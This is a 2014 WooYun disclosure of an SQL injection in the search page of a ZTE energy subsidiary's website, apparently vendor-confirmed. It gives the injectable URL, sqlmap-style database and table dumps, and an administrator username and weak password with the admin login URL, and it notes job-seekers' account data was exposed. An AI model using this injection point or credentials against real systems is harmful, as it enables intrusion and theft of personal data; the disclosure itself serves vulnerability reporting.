当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086412

漏洞标题:中兴通讯某站SQL注射导致大量信息泄露

相关厂商:中兴通讯股份有限公司

漏洞作者: s0rt

提交时间:2014-12-08 17:12

修复时间:2015-01-22 17:14

公开时间:2015-01-22 17:14

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-08: 细节已通知厂商并且等待厂商处理中
2014-12-09: 厂商已经确认,细节仅向厂商公开
2014-12-19: 细节向核心白帽子及相关领域专家公开
2014-12-29: 细节向普通白帽子公开
2015-01-08: 细节向实习白帽子公开
2015-01-22: 细节向公众公开

简要描述:

中兴通讯某站SQL注射导致信息泄露

详细说明:

中兴能源
http://www.zte-e.com/
注射点(搜索页面,其他页面参数都做了类型转换,本来以为没希望了,但发现搜索页面输入'时报错,通过报错页面发现搜索关键字未处理输入类型和特殊字符):
http://www.zte-e.com/cn/Search.aspx?Keyword='
共264个数据库

web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2000
available databases [264]:
[*] 112233a
[*] 123123
[*] 123456
[*] 123456789
[*] 456789
[*] adkin66
[*] agcom12
[*] agronc78
[*] aibj789
[*] anchic6
[*] anco78
[*] andfi78
[*] atm188
[*] aucma001
[*] auto66
[*] baicyx66
[*] bami58
[*] bbeon1
[*] bbzegs55
[*] bdzy70
[*] beiji89
[*] beijing7
[*] besaf55
[*] bfguo21
[*] bgilt635
[*] big64
[*] bjbam35
[*] bjbio87
[*] bjclp5
[*] bjdi46
[*] bjfe49
[*] bjjd665
[*] bjjrb
[*] bjkdlc1
[*] bjkjx1
[*] bjmsi02
[*] bjrel59
[*] bjrenhu7
[*] bjrtac23
[*] bjsrin12
[*] bjsy43
[*] bjtddc
[*] bjucc11
[*] bjw45
[*] bjxst74
[*] bjzh76
[*] blac68
[*] blue43
[*] buka69
[*] chinabei8
[*] chinagz7
[*] chinar1
[*] chnw86
[*] chunaifs
[*] clorgcn1
[*] cnliso21
[*] cnnc66
[*] coat21
[*] comfjzy88
[*] commxtx2
[*] const49
[*] coomexc6
[*] cqxdx
[*] csrs58
[*] culture36
[*] cyph66
[*] daki15
[*] dengm21
[*] digibm21
[*] dlhold56
[*] donghuimuye
[*] dqbe21
[*] dsbncm1
[*] dyer23
[*] eduam12
[*] emp975
[*] expat1
[*] expo26
[*] fanyoo89
[*] fdzd21
[*] feng89
[*] fgnmining1
[*] fjjhep1om
[*] fjjinuo1
[*] fl5674
[*] flgt96
[*] gdlccom1
[*] gemop89
[*] gene54
[*] gfedc659
[*] great66
[*] gree46
[*] gree55
[*] gsk1
[*] gws1necn
[*] gwsj76
[*] gzjz46
[*] hain72
[*] haixin13
[*] hama13
[*] heaven1
[*] high88
[*] hikag54
[*] hlftsb1
[*] hntd001
[*] hobbe8
[*] hongs23
[*] hongyi21
[*] hotgen13
[*] htyq8
[*] hua369
[*] huabjy1
[*] huad19
[*] huaf59
[*] huafeng123
[*] huanzh7
[*] huat16
[*] huaxia5
[*] huaxing9
[*] hugeca1
[*] hxdy31
[*] hyfl978
[*] hytctech3
[*] inageweb8
[*] ind49
[*] inox45
[*] insm49
[*] it05982013
[*] jiagu56
[*] jinc29
[*] jiudia12
[*] jnbw84
[*] jsyinu67
[*] jydi59
[*] jyys74
[*] kaip698
[*] kanglian81
[*] kinn46
[*] kreaci75
[*] land2
[*] leim29
[*] lhq555
[*] lmes87
[*] lookstee01
[*] lxc574
[*] master
[*] matri66
[*] meikub6
[*] mjbjdbsc8
[*] model
[*] msdb
[*] mxx96
[*] neoen9
[*] northstar3
[*] Northwind
[*] nunufo44
[*] oasisligh
[*] offic43
[*] office96
[*] orac56
[*] ork79
[*] picarr12
[*] pion56
[*] pride88
[*] prosyn86
[*] pubs
[*] qbf123
[*] qbfaaa
[*] reac43
[*] read56
[*] read66
[*] resi46
[*] royalrb7
[*] rstests
[*] rui78
[*] sanb48
[*] sani75
[*] sbc26
[*] scil16
[*] sczw
[*] sdsj2012
[*] sdzkf76
[*] sdzlhot7
[*] season85
[*] shangb9
[*] shenh21
[*] shida12
[*] shun94
[*] silkr59
[*] singbt10
[*] sisulanf5
[*] sma1om
[*] smjmw
[*] spainto2
[*] splendor
[*] sxcc
[*] sxss49
[*] sxxjdcygl
[*] tai76
[*] tarcin23
[*] tczy8
[*] tdhp19
[*] tempdb
[*] throu79
[*] tht66
[*] tiantra21
[*] tim66
[*] tjsjgwy8
[*] tjsvw
[*] toyojishop
[*] tria90
[*] truthpro8
[*] tyre69
[*] tyz946
[*] tzm569
[*] waimai662
[*] whir49
[*] whxj86
[*] winstm21
[*] winstr66
[*] winsu85
[*] wisvid1
[*] wohu58
[*] wohu59
[*] wohu86
[*] wonom21
[*] wq5dcost
[*] wtnom1
[*] wxx45
[*] xiang66
[*] xingyuan8
[*] xion66
[*] xito28
[*] xsdt123
[*] xudanbo
[*] xune49
[*] xushwebk
[*] xuze73
[*] yanbet21
[*] yolo43
[*] yqrms78
[*] yrjt28
[*] ysjl19
[*] ytou46
[*] yuexin5
[*] yunguist1
[*] yunz32
[*] yuyuy54
[*] ywc84
[*] zcl84
[*] zgdlcn122
[*] zglawye7
[*] zgsh43
[*] zgxy2012
[*] zhsof30
[*] zika79
[*] zjli42
[*] zkpjweb
[*] zsclbm1
[*] zte1314
[*] ztgz46
[*] zwcnhj12
[*] zwgl03
[*] zzyc48


选择zte1314库,获取表

web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2000
Database: zte1314
[37 tables]
+------------------------+
| sysconstraints         |
| syssegments            |
| zte1314.ApplyJob       |
| zte1314.CityAndCountry |
| zte1314.Cls_Class      |
| zte1314.Col_News       |
| zte1314.Company        |
| zte1314.Dyue           |
| zte1314.Eexperience    |
| zte1314.GuestBook      |
| zte1314.JianLi         |
| zte1314.Link           |
| zte1314.Link_Class     |
| zte1314.LockAdminIP    |
| zte1314.LogLogin       |
| zte1314.Mail           |
| zte1314.Mail_Model     |
| zte1314.Main_Menu      |
| zte1314.Member         |
| zte1314.News_News      |
| zte1314.Note           |
| zte1314.Ord            |
| zte1314.PList          |
| zte1314.S_Menu         |
| zte1314.S_Model        |
| zte1314.SysA_Admin     |
| zte1314.SysP_Possrss   |
| zte1314.UploadFiles    |
| zte1314.UseSoft        |
| zte1314.WebInfo        |
| zte1314.Wexperience    |
| zte1314.ZLanguage      |
| zte1314.ask            |
| zte1314.jobnew         |
| zte1314.pic            |
| zte1314.userpay        |
| zte1314.vote           |
+------------------------+


通过zte1314.Member获取会员用户名和密码,上千条记录都是求职简历,账号、密码、姓名、邮箱、手机、薪资、住址等齐全。。。
通过账号、密码可任意修改用户简历。
可直接点击登录查看。。。。

1.jpg


2.jpg


3.jpg


4.jpg


获取zte1314.SysA_Admin表中的管理员用户名和密码。
这里发现管理员账号后台弱口令

liming/123123


登陆后台 http://www.zte-e.com/manage/AdminLogin.aspx

5.jpg


搞笑的是,这里中兴通讯的友情链接地址居然不是官方链接。。。
由于屏蔽了upload访问权限,获取不了webshell。

漏洞证明:

共264个数据库

web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2000
available databases [264]:
[*] 112233a
[*] 123123
[*] 123456
[*] 123456789
[*] 456789
[*] adkin66
[*] agcom12
[*] agronc78
[*] aibj789
[*] anchic6
[*] anco78
[*] andfi78
[*] atm188
[*] aucma001
[*] auto66
[*] baicyx66
[*] bami58
[*] bbeon1
[*] bbzegs55
[*] bdzy70
[*] beiji89
[*] beijing7
[*] besaf55
[*] bfguo21
[*] bgilt635
[*] big64
[*] bjbam35
[*] bjbio87
[*] bjclp5
[*] bjdi46
[*] bjfe49
[*] bjjd665
[*] bjjrb
[*] bjkdlc1
[*] bjkjx1
[*] bjmsi02
[*] bjrel59
[*] bjrenhu7
[*] bjrtac23
[*] bjsrin12
[*] bjsy43
[*] bjtddc
[*] bjucc11
[*] bjw45
[*] bjxst74
[*] bjzh76
[*] blac68
[*] blue43
[*] buka69
[*] chinabei8
[*] chinagz7
[*] chinar1
[*] chnw86
[*] chunaifs
[*] clorgcn1
[*] cnliso21
[*] cnnc66
[*] coat21
[*] comfjzy88
[*] commxtx2
[*] const49
[*] coomexc6
[*] cqxdx
[*] csrs58
[*] culture36
[*] cyph66
[*] daki15
[*] dengm21
[*] digibm21
[*] dlhold56
[*] donghuimuye
[*] dqbe21
[*] dsbncm1
[*] dyer23
[*] eduam12
[*] emp975
[*] expat1
[*] expo26
[*] fanyoo89
[*] fdzd21
[*] feng89
[*] fgnmining1
[*] fjjhep1om
[*] fjjinuo1
[*] fl5674
[*] flgt96
[*] gdlccom1
[*] gemop89
[*] gene54
[*] gfedc659
[*] great66
[*] gree46
[*] gree55
[*] gsk1
[*] gws1necn
[*] gwsj76
[*] gzjz46
[*] hain72
[*] haixin13
[*] hama13
[*] heaven1
[*] high88
[*] hikag54
[*] hlftsb1
[*] hntd001
[*] hobbe8
[*] hongs23
[*] hongyi21
[*] hotgen13
[*] htyq8
[*] hua369
[*] huabjy1
[*] huad19
[*] huaf59
[*] huafeng123
[*] huanzh7
[*] huat16
[*] huaxia5
[*] huaxing9
[*] hugeca1
[*] hxdy31
[*] hyfl978
[*] hytctech3
[*] inageweb8
[*] ind49
[*] inox45
[*] insm49
[*] it05982013
[*] jiagu56
[*] jinc29
[*] jiudia12
[*] jnbw84
[*] jsyinu67
[*] jydi59
[*] jyys74
[*] kaip698
[*] kanglian81
[*] kinn46
[*] kreaci75
[*] land2
[*] leim29
[*] lhq555
[*] lmes87
[*] lookstee01
[*] lxc574
[*] master
[*] matri66
[*] meikub6
[*] mjbjdbsc8
[*] model
[*] msdb
[*] mxx96
[*] neoen9
[*] northstar3
[*] Northwind
[*] nunufo44
[*] oasisligh
[*] offic43
[*] office96
[*] orac56
[*] ork79
[*] picarr12
[*] pion56
[*] pride88
[*] prosyn86
[*] pubs
[*] qbf123
[*] qbfaaa
[*] reac43
[*] read56
[*] read66
[*] resi46
[*] royalrb7
[*] rstests
[*] rui78
[*] sanb48
[*] sani75
[*] sbc26
[*] scil16
[*] sczw
[*] sdsj2012
[*] sdzkf76
[*] sdzlhot7
[*] season85
[*] shangb9
[*] shenh21
[*] shida12
[*] shun94
[*] silkr59
[*] singbt10
[*] sisulanf5
[*] sma1om
[*] smjmw
[*] spainto2
[*] splendor
[*] sxcc
[*] sxss49
[*] sxxjdcygl
[*] tai76
[*] tarcin23
[*] tczy8
[*] tdhp19
[*] tempdb
[*] throu79
[*] tht66
[*] tiantra21
[*] tim66
[*] tjsjgwy8
[*] tjsvw
[*] toyojishop
[*] tria90
[*] truthpro8
[*] tyre69
[*] tyz946
[*] tzm569
[*] waimai662
[*] whir49
[*] whxj86
[*] winstm21
[*] winstr66
[*] winsu85
[*] wisvid1
[*] wohu58
[*] wohu59
[*] wohu86
[*] wonom21
[*] wq5dcost
[*] wtnom1
[*] wxx45
[*] xiang66
[*] xingyuan8
[*] xion66
[*] xito28
[*] xsdt123
[*] xudanbo
[*] xune49
[*] xushwebk
[*] xuze73
[*] yanbet21
[*] yolo43
[*] yqrms78
[*] yrjt28
[*] ysjl19
[*] ytou46
[*] yuexin5
[*] yunguist1
[*] yunz32
[*] yuyuy54
[*] ywc84
[*] zcl84
[*] zgdlcn122
[*] zglawye7
[*] zgsh43
[*] zgxy2012
[*] zhsof30
[*] zika79
[*] zjli42
[*] zkpjweb
[*] zsclbm1
[*] zte1314
[*] ztgz46
[*] zwcnhj12
[*] zwgl03
[*] zzyc48


选择zte1314库,获取表

web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2000
Database: zte1314
[37 tables]
+------------------------+
| sysconstraints         |
| syssegments            |
| zte1314.ApplyJob       |
| zte1314.CityAndCountry |
| zte1314.Cls_Class      |
| zte1314.Col_News       |
| zte1314.Company        |
| zte1314.Dyue           |
| zte1314.Eexperience    |
| zte1314.GuestBook      |
| zte1314.JianLi         |
| zte1314.Link           |
| zte1314.Link_Class     |
| zte1314.LockAdminIP    |
| zte1314.LogLogin       |
| zte1314.Mail           |
| zte1314.Mail_Model     |
| zte1314.Main_Menu      |
| zte1314.Member         |
| zte1314.News_News      |
| zte1314.Note           |
| zte1314.Ord            |
| zte1314.PList          |
| zte1314.S_Menu         |
| zte1314.S_Model        |
| zte1314.SysA_Admin     |
| zte1314.SysP_Possrss   |
| zte1314.UploadFiles    |
| zte1314.UseSoft        |
| zte1314.WebInfo        |
| zte1314.Wexperience    |
| zte1314.ZLanguage      |
| zte1314.ask            |
| zte1314.jobnew         |
| zte1314.pic            |
| zte1314.userpay        |
| zte1314.vote           |
+------------------------+


通过zte1314.Member获取会员用户名和密码,上千条记录都是求职简历,账号、密码、姓名、邮箱、手机、薪资、住址等齐全。。。
通过账号、密码可任意修改用户简历。
可直接点击登录查看。。。。

1.jpg


2.jpg


3.jpg


4.jpg


获取zte1314.SysA_Admin表中的管理员用户名和密码。
这里发现管理员账号后台弱口令

liming/123123


登陆后台 http://www.zte-e.com/manage/AdminLogin.aspx

5.jpg


搞笑的是,这里中兴通讯的友情链接地址居然不是官方链接。。。
由于屏蔽了upload访问权限,获取不了webshell。
此外,通过旁注扫描,同IP地址上的网站普遍存在sql注入。

修复方案:

这个你们在行。

版权声明:转载请注明来源 s0rt@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-09 09:15

厂商回复:

多谢,幸苦了~

最新状态:

暂无

漏洞评价:

评论